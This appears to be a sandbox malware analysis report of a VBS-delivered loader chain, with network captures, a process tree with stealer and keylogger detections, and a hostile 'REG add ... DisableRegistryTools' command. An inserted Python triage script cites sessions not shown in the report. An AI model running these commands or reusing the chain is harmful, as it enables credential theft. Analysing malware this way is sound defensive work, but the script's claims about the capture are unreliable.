                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 79 44 58 42 4f 4b 2b 48 48 6e 4a 4a 51 43 51 53 55 71 48 63 42 6d 7a 56 46 57 32 57 47 35 30 64 35 67 54 64 37 72 72 70 6b 42 30 52 36 58 63 4b 48 52 70 63 2b 79 4a 6e 53 7a 2b 4f 57 65 54 70 39 38 6c 53 51 77 47 65 4a 7a 6f 41 6e 6e 74 49 65 4a 39 6a 78 34 65 39 31 67 35 54 30 67 4e 69 48 71 36 63 46 59 4b 43 33 65 41 74 67 75 56 33 74 6c 41 64 59 47 36 56 4d 34 54 36 4e 41 77 35 49 7a 38 44 63 68 73 6e 31 46 6a 59 35 58 58 49 72 4a 43 51 78 6a 56 54 57 51 69 71 6d 46 73 71 31 4d 65 50 4e 67 4a 65 55 56 73 42 6d 39 2f 64 62 61 74 59 36 54 4d 30 55 42 6b 66 59 4d 73 6d 69 68 2f 46 4a 65 68 66 34 39 34 64 4f 39 36 6f 35 30 58 70 55 76 4e 75 50 79 5a 6b 6a 34 47 57 63 79 37 66 78 49 6d 7a 43 61 56 68 62 4e 54 30 6d 4a 42 30 37 41 41 76 56 72 30 74 45 64 42
                                                                                      Data Ascii: yDXBOK+HHnJJQCQSUqHcBmzVFW2WG50d5gTd7rrpkB0R6XcKHRpc+yJnSz+OWeTp98lSQwGeJzoAnntIeJ9jx4e91g5T0gNiHq6cFYKC3eAtguV3tlAdYG6VM4T6NAw5Iz8Dchsn1FjY5XXIrJCQxjVTWQiqmFsq1MePNgJeUVsBm9/dbatY6TM0UBkfYMsmih/FJehf494dO96o50XpUvNuPyZkj4GWcy7fxImzCaVhbNT0mJB07AAvVr0tEdB
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 64 47 58 31 67 78 68 56 47 6c 53 47 54 46 54 58 65 52 6b 58 41 31 4d 44 4d 71 33 56 30 43 66 58 64 50 37 75 56 74 53 56 38 49 6a 53 6f 31 46 2b 66 71 49 4e 50 70 64 74 51 7a 42 4c 74 72 51 75 39 6f 6d 45 54 4b 69 6e 69 4b 73 49 50 69 42 39 62 73 57 57 77 5a 35 6d 35 44 46 48 54 31 34 61 69 70 50 38 50 72 70 56 6a 4c 42 50 7a 30 77 67 54 79 35 31 7a 51 6d 7a 38 55 59 38 4e 41 70 59 6c 63 4b 2b 33 52 7a 4b 65 6e 33 6e 48 6e 67 39 6c 4f 2b 6f 64 67 68 68 71 61 51 70 78 6a 43 73 41 55 51 7a 35 37 36 44 6d 39 50 6f 2b 51 63 62 4a 6f 74 37 75 6b 4c 44 56 54 49 4f 30 37 6d 69 6a 4a 43 5a 4a 6e 59 53 4b 45 73 5a 4d 41 44 72 71 4b 36 34 38 31 59 61 50 78 62 4a 5a 70 4c 37 50 6c 66 42 49 66 38 4e 67 51 6c 48 41 55 4a 63 67 44 59 36 4a 46 6e 66 65 57 45 30 2b 65 46
                                                                                      Data Ascii: dGX1gxhVGlSGTFTXeRkXA1MDMq3V0CfXdP7uVtSV8IjSo1F+fqINPpdtQzBLtrQu9omETKiniKsIPiB9bsWWwZ5m5DFHT14aipP8PrpVjLBPz0wgTy51zQmz8UY8NApYlcK+3RzKen3nHng9lO+odghhqaQpxjCsAUQz576Dm9Po+QcbJot7ukLDVTIO07mijJCZJnYSKEsZMADrqK6481YaPxbJZpL7PlfBIf8NgQlHAUJcgDY6JFnfeWE0+eF
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 54 78 5a 31 76 47 50 71 5a 34 50 33 41 64 4f 65 59 47 42 41 2f 55 51 61 79 50 50 4d 53 4c 59 68 51 50 5a 67 69 51 6f 50 71 2f 4e 67 6a 45 2f 53 42 73 2b 44 36 31 77 50 77 30 6c 7a 75 48 6b 6d 41 66 53 6c 61 55 47 38 48 43 70 74 41 78 32 73 68 63 58 51 63 7a 49 4e 35 4f 33 73 30 32 47 66 63 41 42 79 75 62 4b 62 4a 32 39 37 52 5a 45 72 65 73 72 44 66 56 30 72 67 67 74 76 57 64 35 61 50 7a 54 55 38 56 6e 36 49 49 45 74 57 4e 71 35 56 49 2b 42 6a 55 58 36 4f 7a 78 4a 34 65 38 51 7a 6a 4d 67 65 49 7a 2f 35 53 6d 43 55 6a 44 45 51 64 45 66 6c 4b 61 34 34 52 6c 64 53 6b 66 56 46 59 5a 42 73 6d 4b 55 75 53 30 75 6d 33 65 31 74 55 52 54 53 73 70 76 67 50 75 45 52 4f 35 74 2b 47 6a 4a 6a 72 39 4e 5a 70 51 51 6f 76 65 4c 7a 78 30 4c 63 61 42 74 63 50 69 49 31 41 47
                                                                                      Data Ascii: TxZ1vGPqZ4P3AdOeYGBA/UQayPPMSLYhQPZgiQoPq/NgjE/SBs+D61wPw0lzuHkmAfSlaUG8HCptAx2shcXQczIN5O3s02GfcAByubKbJ297RZEresrDfV0rggtvWd5aPzTU8Vn6IIEtWNq5VI+BjUX6OzxJ4e8QzjMgeIz/5SmCUjDEQdEflKa44RldSkfVFYZBsmKUuS0um3e1tURTSspvgPuERO5t+GjJjr9NZpQQoveLzx0LcaBtcPiI1AG


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      1 | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | 1856 | C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2025-01-16 07:29:22 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-16 07:29:22 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:22 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 2327351
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z44cW9kTmae2jEwknmslLv9osTQHdjBtOiNP%2FmJJ7x%2FgvPFvXlEgS5FoaWfD7U%2F5OzE3w0ze7%2FfFYpcp0CQ4mVuwcIrhvV2He8C3tDekPaOcppSgrMlnM35HtCd6t1cZtJKs6qYc"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 902c64e33b4bde9a-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1476&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1978319&cwnd=194&unsent_bytes=0&cid=49dcf55e96156446&ts=221&x=0"
                                                                                      2025-01-16 07:29:22 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      2 | 192.168.2.4 | 49741 | 104.21.96.1 | 443 | 5640 | C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2025-01-16 07:29:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-16 07:29:35 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:35 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 2327364
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfDAoD%2F9h7Wnq4J6VDPABPs11ur7RCwBLqhsXFpF%2FhZjhqVkElx9IG9SsGVTAd8z73uwGpvognwkSECGDVm1kc%2Fus1r4m8XtUtYcO0YVk%2FjilsseBTZf7ZtI8iY5sH3P7QrjVyB6"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 902c653638b8de9a-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1441&rtt_var=550&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1970310&cwnd=194&unsent_bytes=0&cid=7da9d3196fdf8b4e&ts=583&x=0"
                                                                                      2025-01-16 07:29:35 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      3 | 192.168.2.4 | 49743 | 104.21.96.1 | 443 | 5956 | C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2025-01-16 07:29:42 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-16 07:29:42 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:42 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 2327371
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztgLSG8A1FIjeYBWxfniPkIusD4vKZGMke2W41Ov3S7mhykl3glSCwImxlGC24yE5qxQFK1rfM9WIJKcqyl%2FrtzTPqSE380L24GLJnWrJMPfluCKxIct9pZ4ygULGoR30kCEHsbt"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 902c655fdefc72a4-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1944&rtt_var=736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1502057&cwnd=212&unsent_bytes=0&cid=5e5a6110b7bae14e&ts=164&x=0"
                                                                                      2025-01-16 07:29:42 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
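The three behaviours the network capture above records (the public-IP lookup against checkip.dyndns.org with a hard-coded MSIE 6.0 user agent, the follow-up reallyfreegeoip.org/xml/<ip> lookup for that same address from the same liuuazhU.pif process, and the 764756-byte stage-2 download that x.exe pulls with a WinHttpRequest.5 user agent from www.volareconsultoria.com.br) can be turned into a small triage script. The Python below is an added example and is not part of the Joe Sandbox report or of the malware: it runs over Session records constructed from the sessions printed above (bodies cut to what the report captured), the 500 KB download threshold and the host lists are this example's choices rather than anything the report states, and triage(), parse_report_time(), suspicious_process_path() and text_blob_not_pe() are names invented here. One caveat it handles explicitly: the report prints plaintext HTTP rows in CET and decrypted HTTPS rows in UTC (the server's "Date: Thu, 16 Jan 2025 07:29:34 GMT" header sits under the "08:29:34 CET" row), so timestamps are normalised to UTC before the checkip-then-geoip ordering is checked.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Indicator strings copied from the sessions in this report; host lists and threshold are this example's choices.
LEGACY_MSIE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
WINHTTP_UA_PREFIX = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5"
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
LARGE_DOWNLOAD = 500_000            # assumed threshold; the report's stage-2 body is 764756 bytes
B64_TEXT = re.compile(rb"^[A-Za-z0-9+/=\r\n]+$")
CET = timezone(timedelta(hours=1))  # plaintext HTTP rows are printed in CET, decrypted TLS rows in UTC


def parse_report_time(text: str) -> datetime:
    """Normalise both timestamp styles used in the report to aware UTC datetimes."""
    if text.endswith(" CET"):
        head, frac = text[:-4].rsplit(".", 1)   # report has nanoseconds, datetime keeps microseconds
        local = datetime.strptime(head, "%b %d, %Y %H:%M:%S")
        return local.replace(microsecond=int(frac[:6]), tzinfo=CET).astimezone(timezone.utc)
    if text.endswith(" UTC"):
        return datetime.strptime(text[:-4], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    raise ValueError(f"unrecognised timestamp: {text!r}")


@dataclass
class Session:
    when: str            # timestamp exactly as the report prints it
    pid: int
    process: str
    host: str
    path: str
    user_agent: str      # "" when the request carried no User-Agent header
    content_length: int
    body: bytes          # leading bytes of the response body as captured


def ip_from_checkip_body(body: bytes):
    """Pull the public address out of the checkip.dyndns.org HTML reply, or None."""
    m = re.search(rb"Current IP Address: (\d{1,3}(?:\.\d{1,3}){3})", body)
    return m.group(1).decode() if m else None


def suspicious_process_path(path: str) -> bool:
    """Executable run from C:\\Users\\Public or %TEMP%, as both processes in the report are."""
    p = path.lower()
    odd_dir = p.startswith("c:\\users\\public\\") or "\\appdata\\local\\temp\\" in p
    return odd_dir and p.endswith((".pif", ".scr", ".com", ".exe"))


def text_blob_not_pe(body: bytes) -> bool:
    """True when the captured body is base64-alphabet text rather than an MZ image."""
    return not body.startswith(b"MZ") and bool(B64_TEXT.match(body))


def triage(sessions: list) -> list:
    """Return de-duplicated (pid, finding) pairs in chronological (UTC) order."""
    findings: list = []
    learned: dict = {}   # pid -> (public IP learned via checkip, UTC time it was learned)

    def add(pid: int, msg: str) -> None:
        if (pid, msg) not in findings:
            findings.append((pid, msg))

    for s in sorted(sessions, key=lambda x: parse_report_time(x.when)):
        t = parse_report_time(s.when)
        if suspicious_process_path(s.process):
            add(s.pid, f"network activity from suspicious path {s.process}")
        if s.host in IP_CHECK_HOSTS:
            if s.user_agent == LEGACY_MSIE_UA:
                add(s.pid, "public-IP lookup with hard-coded MSIE 6.0 user agent")
            ip = ip_from_checkip_body(s.body)
            if ip:
                learned[s.pid] = (ip, t)
        elif s.host in GEOIP_HOSTS:
            ip = s.path.rsplit("/", 1)[-1]
            known = learned.get(s.pid)
            if known and known[0] == ip and t > known[1]:
                add(s.pid, f"geolocation of own public IP {ip} "
                           f"{(t - known[1]).total_seconds():.0f}s after checkip")
        elif (s.user_agent.startswith(WINHTTP_UA_PREFIX)
              and s.content_length > LARGE_DOWNLOAD and text_blob_not_pe(s.body)):
            add(s.pid, f"large encoded download via WinHttpRequest from {s.host}{s.path}")
    return findings


# Constructed records mirroring the sessions printed above; bodies cut to what the report captured.
CHECKIP_BODY = (b"<html><head><title>Current IP Check</title></head>"
                b"<body>Current IP Address: 8.46.123.189</body></html>\r\n")
GEOIP_BODY = b"<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n"
STAGE2_BODY = (b"8jJpGsksdKfYHSrnHXFFouPKgw9EctEdQhm1LW7Wrp1KvQcCTfnRXIu31Z9UrPn0XAHSTJrG"
               b"1aZKtutl9c5gvotqq/eXUexKh/iom3i2BqBj6U5287Ojbqvvpl")
PIF = r"C:\Users\Public\Libraries\liuuazhU.pif"
SESSIONS = [
    Session("2025-01-16 07:29:14 UTC", 6492, r"C:\Users\user\AppData\Local\Temp\x.exe",
            "www.volareconsultoria.com.br", "/245_Uhzauuilkul", WINHTTP_UA_PREFIX + ")",
            764756, STAGE2_BODY),
    Session("Jan 16, 2025 08:29:40.961503983 CET", 5956, PIF, "checkip.dyndns.org", "/",
            LEGACY_MSIE_UA, 104, CHECKIP_BODY),
    Session("2025-01-16 07:29:42 UTC", 5956, PIF, "reallyfreegeoip.org",
            "/xml/8.46.123.189", "", 362, GEOIP_BODY),
]

if __name__ == "__main__":
    for pid, msg in triage(SESSIONS):
        print(f"PID {pid}: {msg}")
```

On the constructed records this yields five findings: the two run locations, the legacy user agent on the checkip request, the large base64-alphabet body fetched by x.exe, and the geolocation of the freshly learned public IP about one second after checkip. The geoip correlation is keyed on the process that learned the address, so the geoip sessions from PIDs 1856 and 5640 above only produce that finding if their own checkip exchanges are in the capture being triaged; the body check is deliberately weak (it only distinguishes printable base64 text from an MZ header) because the report shows just the first bytes of each chunk.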


                                                                                      Target ID:0
                                                                                      Start time:02:29:11
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs"
                                                                                      Imagebase:0x7ff7a6930000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:02:29:12
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:854'016 bytes
                                                                                      MD5 hash:4692AEE744A1B1FAB794FF334A77A462
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000003.1799207040.000000007FCB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 42%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:02:29:15
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\UhzauuilF.cmd" "
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:02:29:15
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:02:29:17
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:02:29:18
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:02:29:18
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:175'800 bytes
                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3109531523.000000001D5BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000001.1853843841.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:7
                                                                                      Start time:02:29:22
                                                                                      Start date:16/01/2025
                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                      Imagebase:0x550000
                                                                                      File size:59'392 bytes
